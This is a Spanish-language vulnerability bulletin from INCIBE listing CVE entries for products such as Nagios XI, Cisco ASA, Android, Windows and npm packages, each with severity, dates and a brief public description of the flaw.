Instituto Nacional de ciberseguridad. Sección Incibe

Boletín de vulnerabilidades

Vulnerabilidades con productos recientemente documentados:

No hay vulnerabilidades nuevas para los productos a los que está suscrito.



Otras vulnerabilidades de los productos a los que usted está suscrito, y cuya información ha sido actualizada recientemente:

  • Vulnerabilidad en el archivo hue-magic.js en la API res.sendFile en node-red-contrib-huemagic (CVE-2021-25864)
    Severidad: MEDIA
    Fecha de publicación: 26/01/2021
    Fecha de última actualización: 16/08/2023
    node-red-contrib-huemagic versión 3.0.0, está afectado por un Salto de Directorio de hue/assets/..%2F en la API res.sendFile, usada en el archivo hue-magic.js, para recuperar un archivo arbitrario
  • CVE-2021-25863
    Severidad: ALTA
    Fecha de publicación: 26/01/2021
    Fecha de última actualización: 08/08/2023
    Open5GS versión 2.1.3 escucha sobre 0.0.0.0:3000 y presenta una contraseña predeterminada de 1423 para la cuenta de administrador
  • CVE-2021-26267
    Severidad: MEDIA
    Fecha de publicación: 26/01/2021
    Fecha de última actualización: 08/08/2023
    cPanel versiones anteriores a 92.0.9, permite a un usuario de MySQL (que presenta un hash de contraseña antiguo) omitir una suspensión (SEC-579)
  • CVE-2021-23329
    Severidad: MEDIA
    Fecha de publicación: 31/01/2021
    Fecha de última actualización: 08/08/2023
    El paquete nested-object-assign versiones anteriores a 1.0.4, es vulnerable a una Contaminación de Prototipo mediante la función predeterminada, como es demostrado al ejecutar la PoC a continuación
  • CVE-2021-25912
    Severidad: ALTA
    Fecha de publicación: 02/02/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación del prototipo en "dotty" versiones 0.0.1 hasta 0.1.0, permite a atacantes causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2021-25761
    Severidad: MEDIA
    Fecha de publicación: 03/02/2021
    Fecha de última actualización: 08/08/2023
    En JetBrains Ktor versiones anteriores a 1.5.0, fue posible un ataque de tipo birthday en la clave de SessionStorage
  • CVE-2021-0336
    Severidad: ALTA
    Fecha de publicación: 10/02/2021
    Fecha de última actualización: 08/08/2023
    En la función onReceive del archivo BluetoothPermissionRequest.java, se presenta una posible omisión de permisos debido a un PendingIntent mutable. Esto podría conllevar a una escalada de privilegios local que omite una comprobación de permisos, con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-9 Android-10 Android-11 Android-8.1, ID de Android: A-158219161
  • CVE-2021-21472
    Severidad: MEDIA
    Fecha de publicación: 09/02/2021
    Fecha de última actualización: 08/08/2023
    SAP Software Provisioning Manager versión 1.0 (SAP NetWeaver Master Data Management Server versión 7.1) no posee una opción para ajustar una contraseña durante su instalación, esto permite a un atacante autenticado llevar a cabo varios ataques de seguridad como Salto de Directorio, Ataque de Fuerza Bruta de Contraseña, Ataque de SMB Relay, Degradación de la Seguridad
  • CVE-2021-27101
    Severidad: ALTA
    Fecha de publicación: 16/02/2021
    Fecha de última actualización: 08/08/2023
    Accellion versiones FTA 9_12_370 y anteriores, están afectadas por una inyección SQL por medio de un encabezado de Host diseñado en una petición al archivo document_root.html. La versión corregida es FTA_9_12_380 y posteriores
  • CVE-2021-0109
    Severidad: MEDIA
    Fecha de publicación: 17/02/2021
    Fecha de última actualización: 08/08/2023
    Los permisos heredados no seguros para el paquete de controladores Intel® SOC para STK1A32SC versión anterior a 604, pueden permitir a un usuario autenticado habilitar potencialmente una escalada de privilegios por medio de un acceso local
  • CVE-2021-25648
    Severidad: ALTA
    Fecha de publicación: 16/02/2021
    Fecha de última actualización: 08/08/2023
    La aplicación movil "Testes de Codigo" versiones 11.4 y anteriores, permite a un atacante conseguir acceso a la interfaz administrativa y las funcionalidades premium al alterar el valor booleano de los parámetros "isAdmin" e "isPremium" ubicados en el almacenamiento del dispositivo
  • CVE-2020-29369
    Severidad: MEDIA
    Fecha de publicación: 28/11/2020
    Fecha de última actualización: 28/07/2023
    Se detectó un problema en el archivo mm/mmap.c en el kernel de Linux versiones anteriores a 5.7.11. Se presenta una condición de carrera entre determinadas funciones expand (expand_downwards y expand_upwards) y operaciones de liberación de page-table de una llamada munmap, también se conoce como CID-246c320a8cfe
  • CVE-2021-25913
    Severidad: ALTA
    Fecha de publicación: 08/02/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación del prototipo en "set-or-get" versiones 1.0.0 hasta 1.2.10, permite a un atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2021-25296
    Severidad: ALTA
    Fecha de publicación: 15/02/2021
    Fecha de última actualización: 08/08/2023
    Nagios XI versión xi-5.7.5, esta afectada por una inyección de comandos del Sistema Operativo. La vulnerabilidad se presenta en el archivo /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php debido a un saneamiento inapropiado de la entrada controlada por el usuario autenticado mediante una única petición HTTP, que puede conllevar a una inyección de comandos del el servidor de Nagios XI
  • CVE-2021-25298
    Severidad: ALTA
    Fecha de publicación: 15/02/2021
    Fecha de última actualización: 08/08/2023
    Nagios XI versión xi-5.7.5, esta afectada por una inyección de comandos del Sistema Operativo. La vulnerabilidad se presenta en el archivo /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php debido a un saneamiento inapropiado de la entrada controlada por el usuario autenticado mediante una única petición HTTP, lo que puede conducir a una inyección de comandos del Sistema Operativo en el servidor de Nagios XI
  • CVE-2021-21126
    Severidad: MEDIA
    Fecha de publicación: 09/02/2021
    Fecha de última actualización: 08/08/2023
    Una aplicación de políticas insuficientes en extensions de Google Chrome versiones anteriores a 88.0.4324.96, permitió a un atacante remoto omitir el aislamiento del sitio por medio de una Extension de Chrome diseñada
  • CVE-2021-23126
    Severidad: MEDIA
    Fecha de publicación: 04/03/2021
    Fecha de última actualización: 08/08/2023
    Se detectó un problema en Joomla! versiones 3.2.0 hasta 3.9.24. Uso de la función no segura rand() dentro del proceso de generación del secreto 2FA
  • CVE-2021-25914
    Severidad: ALTA
    Fecha de publicación: 01/03/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación de prototipo en "object-collider" versiones 1.0.0 hasta 1.0.3, permite al atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2021-25297
    Severidad: ALTA
    Fecha de publicación: 15/02/2021
    Fecha de última actualización: 08/08/2023
    Nagios XI versión xi-5.7.5, esta afectada por una inyección de comandos del Sistema Operativo. La vulnerabilidad se presenta en el archivo /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php debido a un saneamiento inapropiado de la entrada controlada por el usuario autenticado mediante una única petición HTTP, lo que puede conllevar a una inyección de comandos del sistema operativo en el servidor de Nagios XI
  • CVE-2020-36158
    Severidad: ALTA
    Fecha de publicación: 05/01/2021
    Fecha de última actualización: 28/07/2023
    La función mwifiex_cmd_802_11_ad_hoc_start en el archivo drivers/net/wireless/marvell/mwifiex/join.c en el kernel de Linux versiones hasta 5.10.4, podría permitir a atacantes remotos ejecutar código arbitrario por medio de un valor SSID grande, también se conoce como CID-5c455c5ab332
  • CVE-2021-0386
    Severidad: MEDIA
    Fecha de publicación: 10/03/2021
    Fecha de última actualización: 08/08/2023
    En onCreate de UsbConfirmActivity, se presenta un posible vector de tapjacking debido a un valor predeterminado no seguro. Esto podría conllevar a una escalada de privilegios local con los privilegios de ejecución User necesarios. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-11, ID de Android: A-173421110
  • CVE-2021-0391
    Severidad: MEDIA
    Fecha de publicación: 10/03/2021
    Fecha de última actualización: 08/08/2023
    En la función onCreate() del archivo ChooseTypeAndAccountActivity.java, se presenta una manera posible de conocer la existencia de una cuenta, sin permisos, debido a un ataque de tipo tapjacking/overlay. Esto podría conllevar a una escalada de privilegios local con los privilegios de ejecución User necesarios. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-11 Android-8.1 Android-9 Android-10, ID de Android: A-172841550
  • CVE-2021-0369
    Severidad: MEDIA
    Fecha de publicación: 10/03/2021
    Fecha de última actualización: 08/08/2023
    En el archivo CrossProfileAppsServiceImpl.java, se presenta la posibilidad de que el estado de concesión INTERACT_ACROSS_PROFILES de una aplicación no se muestre apropiadamente en la interfaz de usuario de configuración debido a un error lógico en el código. Esto podría conllevar a una escalada de privilegios local sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-11, ID de Android: A-166561076
  • CVE-2021-26411
    Severidad: MEDIA
    Fecha de publicación: 11/03/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Corrupción de la Memoria de Internet Explorer
  • CVE-2021-23354
    Severidad: MEDIA
    Fecha de publicación: 12/03/2021
    Fecha de última actualización: 08/08/2023
    El paquete printf versiones anteriores a 0.6.1, es vulnerable a una Denegación de Servicio de Expresión Regular (ReDoS) por medio de la cadena de expresiones regulares /\%(?:\(([\w_.]+)\)|([1-9]\d*)\$)?([0+\ -\]*)(\* |\d+)?(\.)? (\*|\D+)? [HlL]?([\% BscdeEfFgGioOuxX])/g en la biblioteca lib/printf.js. La expresión regular vulnerable tiene una complejidad de tiempo en el peor de los casos cúbica
  • CVE-2021-27885
    Severidad: MEDIA
    Fecha de publicación: 02/03/2021
    Fecha de última actualización: 08/08/2023
    El archivo usersettings.php en e107 hasta la versión 2.3.0, carece de cierto mecanismo de protección e_TOKEN
  • CVE-2021-25916
    Severidad: ALTA
    Fecha de publicación: 16/03/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación del prototipo en "patchmerge" versiones 1.0.0 hasta 1.0.1, permite a un atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • Vulnerabilidad en Microsoft Enhanced Cryptographic Provider (CVE-2021-31201)
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios en Microsoft Enhanced Cryptographic Provider. Este ID de CVE es diferente de CVE-2021-31199
  • Vulnerabilidad en Windows Print Spooler (CVE-2021-1675)
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Escalada de Privilegios de Windows Print Spooler
  • CVE-2021-26414
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Omisión de la Funcionalidad de Seguridad en Windows DCOM Server
  • Vulnerabilidad en Microsoft Enhanced Cryptographic Provider (CVE-2021-31199)
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios en Microsoft Enhanced Cryptographic Provider. Este ID de CVE es diferente de CVE-2021-31201
  • Vulnerabilidad en Microsoft SharePoint Server (CVE-2021-31948)
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad de Microsoft SharePoint Server. Este ID de CVE es diferente de CVE-2021-31950, CVE-2021-31964
  • CVE-2021-31956
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Escalada de Privilegios en Windows NTFS
  • CVE-2021-31957
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Denegación de Servicio en ASP.NET
  • CVE-2021-31960
    Severidad: BAJA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows Bind Filter Driver
  • CVE-2021-31962
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Omisión de la Característica de Seguridad en Kerberos AppContainer
  • CVE-2021-31972
    Severidad: BAJA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información en Event Tracing para Windows
  • Vulnerabilidad en Server para NFS (CVE-2021-31975)
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información en Server para NFS. Este ID de CVE es diferente de CVE-2021-31976
  • Vulnerabilidad en Server para NFS (CVE-2021-31976)
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información en Server para NFS. Este ID de CVE es diferente de CVE-2021-31975
  • CVE-2021-33742
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows MSHTML Platform
  • CVE-2021-0056
    Severidad: MEDIA
    Fecha de publicación: 09/06/2021
    Fecha de última actualización: 08/08/2023
    Unos permisos heredados no seguros para Intel® NUC M15 Laptop Kit Driver Pack software versiones anteriores a versión actualizada 1.1 pueden habilitar a un usuario autenticado para permitir potencialmente una escalada de privilegios por medio de un acceso local
  • Vulnerabilidad en el envío de una carga útil al puerto 5001 en un sistema de administración de conferencias de ZTE (CVE-2021-21741)
    Severidad: ALTA
    Fecha de publicación: 30/08/2021
    Fecha de última actualización: 05/06/2023
    Un sistema de administración de conferencias de ZTE, está afectado por una vulnerabilidad de ejecución de comandos. Dado que el servicio de objetos java de soapmonitor está habilitado por defecto, el atacante podría aprovechar esta vulnerabilidad para ejecutar comandos arbitrario mediante el envío de una carga útil deserializada al puerto 5001.
  • CVE-2021-21972
    Severidad: ALTA
    Fecha de publicación: 24/02/2021
    Fecha de última actualización: 08/08/2023
    El VSphere Client (HTML5) contiene una vulnerabilidad de ejecución de código remota en un plugin de vCenter Server. Un actor malicioso con acceso de red al puerto 443 puede explotar este problema para ejecutar comandos con privilegios no restringidos en el sistema operativo subyacente que aloja vCenter Server. Esto afecta a VMware vCenter Server (versiones 7.x anteriores a 7.0 U1c, versiones 6.7 anteriores a 6.7 U3l y versiones 6.5 anteriores a 6.5 U3n) y VMware Cloud Foundation (versiones 4.x anteriores a 4.2 y versiones 3.x anteriores a 3.10.1.2)
  • CVE-2021-33582
    Severidad: MEDIA
    Fecha de publicación: 01/09/2021
    Fecha de última actualización: 08/08/2023
    Cyrus IMAP versiones anteriores a 3.4.2, permite a atacantes remotos causar una denegación de servicio (cuelgue del demonio de varios minutos) por medio de una entrada manejada inapropiadamente durante la interacción de la tabla hash. Debido a que presenta muchas inserciones en un solo cubo, strcmp se vuelve lento. Esto se ha corregido en las versiones 3.4.2, 3.2.8 y 3.0.16
  • CVE-2021-31797
    Severidad: BAJA
    Fecha de publicación: 01/09/2021
    Fecha de última actualización: 08/08/2023
    El mecanismo de identificación de usuarios usado por CyberArk Credential Provider versiones anteriores a 12.1, es susceptible a una condición de carrera del host local, conllevando a una divulgación de contraseña
  • CVE-2021-38703
    Severidad: ALTA
    Fecha de publicación: 01/09/2021
    Fecha de última actualización: 08/08/2023
    Unos dispositivos inalámbricos que ejecutan determinados firmware derivados de Arcadyan (como KPN Experia WiFi versión 1.00.15) no sanean correctamente la entrada del usuario en el formulario de configuración del syslog. Un atacante remoto autenticado podría aprovechar esto para alterar la configuración del dispositivo y lograr una ejecución de código remota. Esto puede ser explotado en conjunto con CVE-2021-20090
  • CVE-2019-15992
    Severidad: ALTA
    Fecha de publicación: 22/09/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación del intérprete Lua integrado en Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto autenticado ejecutar código arbitrario con privilegios root en el sistema operativo Linux subyacente de un dispositivo afectado. La vulnerabilidad es debido a restricciones insuficientes en las llamadas a funciones Lua permitidas dentro del contexto de los scripts Lua suministrados por el usuario. Una explotación con éxito podría permitir al atacante desencadenar una condición de desbordamiento de la pila y ejecutar código arbitrario con privilegios root en el sistema operativo Linux subyacente de un dispositivo afectado
  • CVE-2021-34548
    Severidad: MEDIA
    Fecha de publicación: 29/06/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Tor versiones anteriores a 0.4.6.5, también se conoce como TROVE-2021-003. Un atacante puede falsificar las funciones RELAY_END o RELAY_RESOLVED para omitir el control de acceso previsto para terminar un flujo
  • Vulnerabilidad en peticiones HTTP en la interfaz web de Cisco Adaptive Security Appliance (ASA) Software y Firepower Threat Defense (FTD) Software (CVE-2020-3304)
    Severidad: ALTA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz web de Cisco Adaptive Security Appliance (ASA) Software y Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar que un dispositivo afectado se recargue inesperadamente, resultando en una condición de denegación de servicio (DoS). La vulnerabilidad es debido a una falta de comprobación apropiada de entrada de las peticiones HTTP. Un atacante podría explotar esta vulnerabilidad mediante el envío de una petición HTTP diseñada hacia un dispositivo afectado. Una explotación podría permitir al atacante causar una condición de DoS. Nota: Esta vulnerabilidad se aplica al tráfico HTTP IP versión 4 (IPv4) e IP versión 6 (IPv6)
  • Vulnerabilidad en el análisis de las URL no válidas en la interfaz de servicios web del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3259)
    Severidad: MEDIA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz de servicios web del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado recuperar contenido de la memoria sobre un dispositivo afectado, lo que podría conducir a la divulgación de información confidencial . La vulnerabilidad es debido a un problema de rastreo del búfer cuando el software analiza las URL no válidas que son solicitadas desde la interfaz de servicios web. Un atacante podría explotar esta vulnerabilidad mediante el envío de una petición GET diseñada hacia la interfaz de servicios web. Una explotación con éxito podría permitir a un atacante recuperar el contenido de la memoria, lo que podría conllevar a la divulgación de información confidencial. Nota: Esta vulnerabilidad solo afecta a configuraciones específicas de AnyConnect y WebVPN. Para más información, consulte la sección Vulnerable Products.
  • CVE-2021-31207
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Omisión de la Característica de Seguridad de Microsoft Exchange Server
  • CVE-2021-30713
    Severidad: MEDIA
    Fecha de publicación: 08/09/2021
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de permisos con una comprobación mejorada. Este problema es corregido en macOS Big Sur versión 11.4. Una aplicación maliciosa puede ser capaz de omitir las preferencias de privacidad. Apple presenta conocimiento de un informe que indica que este problema puede haber sido explotado activamente
  • CVE-2021-31231
    Severidad: BAJA
    Fecha de publicación: 30/04/2021
    Fecha de última actualización: 08/08/2023
    Alertmanager en Grafana Enterprise Metrics versiones anteriores a 1.2.1 y Metrics Enterprise versión1.2.1, presenta una vulnerabilidad de divulgación de archivos locales cuando es usado experimental.alertmanager.enable-api. El archivo de contraseña de autenticación básica HTTP se puede usar como un vector de ataque para enviar cualquier contenido de archivo por medio de un webhook. Las plantillas de alertmanager pueden ser usado como vector de ataque para enviar cualquier contenido de archivo porque alertmanager puede cargar cualquier archivo de texto especificado en la lista de plantillas.
  • CVE-2021-25947
    Severidad: ALTA
    Fecha de publicación: 03/06/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación de prototipos en "nestie" versiones 0.0.0 hasta 1.0.0, permite a un atacante causar una denegación de servicio y puede conllevar una ejecución de código remota
  • CVE-2021-24330
    Severidad: BAJA
    Fecha de publicación: 01/06/2021
    Fecha de última actualización: 09/08/2023
    El plugin Funnel Builder by CartFlows – Create High Converting Sales Funnels para WordPress versiones anteriores a 1.6.13, no saneaba sus configuraciones facebook_pixel_id y google_analytics_id, permitiendo a usuarios muy privilegiados configurar una carga útil de tipo XSS en ellos, que se ejecutará en las páginas generadas por el plugin, o todo el sitio web, dependiendo de la configuración usada
  • CVE-2021-38163
    Severidad: ALTA
    Fecha de publicación: 14/09/2021
    Fecha de última actualización: 08/08/2023
    SAP NetWeaver (Visual Composer 7.0 RT) versiones - 7.30, 7.31, 7.40, 7.50, sin restricción, un atacante autenticado como usuario no administrativo puede cargar un archivo malicioso a través de la red y desencadenar su procesamiento, que es capaz de ejecutar comandos del sistema operativo con el privilegio del proceso del servidor Java. Estos comandos pueden ser usados para leer o modificar cualquier información en el servidor o apagar el servidor haciendo que no esté disponible
  • CVE-2021-36955
    Severidad: MEDIA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Windows Common Log File System Driver. Este CVE ID es diferente de CVE-2021-36963, CVE-2021-38633
  • CVE-2018-1320
    Severidad: MEDIA
    Fecha de publicación: 07/01/2019
    Fecha de última actualización: 16/08/2023
    La librería de cliente Java de Apache Thrift, desde la versión 0.5.0 hasta la 0.11.0, puede omitir la validación de la negociación de SASL "isComplete" en la clase org.apache.thrift.transport.TSaslTransport. Una aserción utilizada para determinar si el handshake SASL se ha completado de manera exitosa podría deshabilitarse en los ajustes de producción, prohibiendo que la validación se complete.
  • CVE-2021-40823
    Severidad: MEDIA
    Fecha de publicación: 13/09/2021
    Fecha de última actualización: 08/08/2023
    Un error lógico en la funcionalidad de compartición de claves de sala de matrix-js-sdk (también conocido como Matrix Javascript SDK) antes de la versión 12.4.1 permite que un servidor doméstico de Matrix malicioso presente en una sala cifrada robe las claves de cifrado de la sala (a través de mensajes de protocolo de Matrix manipulados) que fueron enviados originalmente por los clientes de Matrix afectados que participan en esa sala. Esto permite al servidor doméstico descifrar los mensajes cifrados de extremo a extremo enviados por los clientes afectados.e dispositivo
  • CVE-2021-40824
    Severidad: MEDIA
    Fecha de publicación: 13/09/2021
    Fecha de última actualización: 08/08/2023
    Un error lógico en la funcionalidad de compartición de claves de sala de Element Android antes de la versión 1.2.2 y matrix-android-sdk2 (también conocido como Matrix SDK para Android) antes de la versión 1.2.2 permite a un servidor doméstico de Matrix malicioso presente en una sala cifrada robar las claves de cifrado de la sala (a través de mensajes de protocolo de Matrix falsificados) que fueron enviados originalmente por los clientes de Matrix afectados que participan en esa sala. Esto permite al atacante descifrar los mensajes cifrados de extremo a extremo enviados por los clientes afectados
  • CVE-2021-38646
    Severidad: MEDIA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota en Microsoft Office Access Connectivity Engine
  • CVE-2021-38649
    Severidad: MEDIA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Open Management Infrastructure. Este CVE ID es diferente de CVE-2021-38645, CVE-2021-38648
  • CVE-2021-38645
    Severidad: MEDIA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Open Management Infrastructure. Este CVE ID es diferente de CVE-2021-38648, CVE-2021-38649
  • CVE-2021-36942
    Severidad: MEDIA
    Fecha de publicación: 12/08/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de suplantación de identidad en Windows LSA
  • CVE-2021-23446
    Severidad: MEDIA
    Fecha de publicación: 29/09/2021
    Fecha de última actualización: 08/08/2023
    El paquete handsontable versiones anteriores a 10.0.0; el paquete handsontable desde la versión 0 y anterior a 10.0.0 son vulnerables a una Denegación de Servicio por Expresión Regular (ReDoS) en la función Handsontable.helper.isNumeric
  • CVE-2021-23445
    Severidad: MEDIA
    Fecha de publicación: 27/09/2021
    Fecha de última actualización: 15/08/2023
    Esto afecta al paquete datatables.net versiones anteriores a 1.11.3. Si se pasa un array a la función de entidades de escape de HTML no se escapa su contenido
  • CVE-2021-40325
    Severidad: MEDIA
    Fecha de publicación: 04/10/2021
    Fecha de última actualización: 08/08/2023
    Cobbler versiones anteriores a 3.3.0, permite omitir una autorización para modificar la configuración
  • CVE-2021-41073
    Severidad: ALTA
    Fecha de publicación: 19/09/2021
    Fecha de última actualización: 08/08/2023
    La función loop_rw_iter en fs/io_uring.c en el kernel de Linux desde la versión 5.10 hasta la versión 5.14.6 permite a los usuarios locales ganar privilegios mediante el uso de IORING_OP_PROVIDE_BUFFERS para desencadenar una liberación de un búfer del kernel, como se ha demostrado utilizando /proc//maps para su explotación
  • CVE-2021-41122
    Severidad: MEDIA
    Fecha de publicación: 05/10/2021
    Fecha de última actualización: 02/08/2023
    Vyper es un lenguaje de contrato inteligente de Python para el EVM. En las versiones afectadas, las funciones externas no comprueban correctamente los límites de los argumentos decimales. Esto puede conllevar a errores lógicos. Este problema ha sido resuelto en la versión 0.3.0
  • CVE-2021-41121
    Severidad: MEDIA
    Fecha de publicación: 06/10/2021
    Fecha de última actualización: 02/08/2023
    Vyper es un Lenguaje de Contrato Inteligente de Python para el EVM. En las versiones afectadas, cuando se lleva a cabo una llamada a una función dentro de una estructura literal, se presenta un problema de corrupción de memoria que se produce debido a un puntero incorrecto en la parte superior de la pila. Este problema ha sido resuelto en la versión 0.3.0
  • CVE-2021-32066
    Severidad: MEDIA
    Fecha de publicación: 01/08/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Ruby versiones hasta 2.6.7, versiones 2.7.x hasta 2.7.3, y versiones 3.x hasta 3.0.1. Net::IMAP no lanza una excepción cuando StartTLS falla con una respuesta desconocida, lo que podría permitir a atacantes tipo man-in-the-middle omitir las protecciones TLS, al aprovechar una posición de red entre el cliente y el registro para bloquear el comando StartTLS, también se conoce como "StartTLS stripping attack"
  • CVE-2021-36934
    Severidad: MEDIA
    Fecha de publicación: 22/07/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows
  • Vulnerabilidad en Windows NAT de Microsoft (CVE-2021-40463)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Denegación de Servicio de Windows NAT
  • Vulnerabilidad en el manejador de sesión SSL/TLS en Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3572)
    Severidad: MEDIA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el manejador de sesión SSL/TLS Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. La vulnerabilidad es debido a una pérdida de memoria al cerrar las conexiones SSL/TLS en un estado específico. Un atacante podría explotar esta vulnerabilidad mediante el establecimiento de múltiples sesiones SSL/TLS y asegurándose de que estén cerradas en determinadas condiciones. Una explotación con éxito podría permitir a un atacante agotar los recursos de la memoria en el dispositivo afectado, lo que impediría el procesamiento de nuevas conexiones SSL/TLS, resultando en una DoS. Es requerida una intervención manual para recuperar un dispositivo afectado
  • Vulnerabilidad en el motor de inspección FTP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3564)
    Severidad: MEDIA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el motor de inspección FTP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado omitir la inspección FTP. La vulnerabilidad es debido a un seguimiento de flujo ineficiente del tráfico FTP. Un atacante podría explotar esta vulnerabilidad mediante el envío de tráfico FTP diseñado por medio de un dispositivo afectado. Una explotación con éxito podría permitir a un atacante omitir la inspección de FTP y completar con éxito las conexiones FTP
  • Vulnerabilidad en Windows Hyper-V de Microsoft (CVE-2021-40461)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de ejecución de código remota de Windows Hyper-V. Este ID de CVE es diferente de CVE-2021-38672
  • CVE-2021-40460
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Omisión de la Funcionalidad de Seguridad de Windows Remote Procedure Call Runtime
  • CVE-2021-40456
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Omisión de la Funcionalidad de Seguridad de Windows AD FS
  • Vulnerabilidad en Win32k de Microsoft (CVE-2021-41357)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Win32k. Este ID de CVE es único de CVE-2021-40449, CVE-2021-40450
  • CVE-2021-40455
    Severidad: BAJA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad en Windows Installer
  • Vulnerabilidad en Win32k de Microsoft (CVE-2021-40450)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Win32k . Este ID de CVE es diferente de CVE-2021-40449, CVE-2021-41357
  • Vulnerabilidad en Windows Common Log File System Driver de Microsoft (CVE-2021-40443)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Common Log File System Driver. Este ID de CVE es diferente de CVE-2021-40466, CVE-2021-40467
  • CVE-2021-38663
    Severidad: BAJA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows exFAT File System
  • Vulnerabilidad en Windows Fast FAT File System Driver de Microsoft (CVE-2021-38662)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
